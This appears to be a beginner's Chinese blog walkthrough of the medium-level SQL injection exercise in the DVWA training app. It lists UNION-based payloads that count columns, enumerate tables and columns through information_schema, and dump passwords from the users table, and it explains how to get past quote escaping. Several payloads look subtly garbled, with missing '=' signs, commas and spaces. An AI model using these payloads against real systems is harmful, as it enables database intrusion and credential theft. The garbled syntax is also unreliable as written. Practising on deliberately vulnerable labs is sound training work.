DVWA 的Sql injection 中的medium

发布时间:2026/8/16 1:21:55
DVWA 的Sql injection 中的medium DVWA 的Sql injection 中的medium参考方法初学者方法不一定对只是参考有不对的欢迎评论区指错1.是用页面注入完成的 右键Submit选择Inspect找到User ID就可以改参数了2.恒真条件 1 or 113.看数据库名 1 union select 1database4.查询语句字段数 1 or 11 order by 1#5.显示表名 1 union select1group_concat(table_name) from information_schema.tables6.显示密码 1 union select1,group_concat(password) from users7.获取表中的字段名 1 union select1,group_concat(column_name) from information_schema.columns注意在网页输入的语法和学的不太一样。第一是没有单引号是因为单引号会被转义。第二是没有where条件是因为这样可以饶过单引号。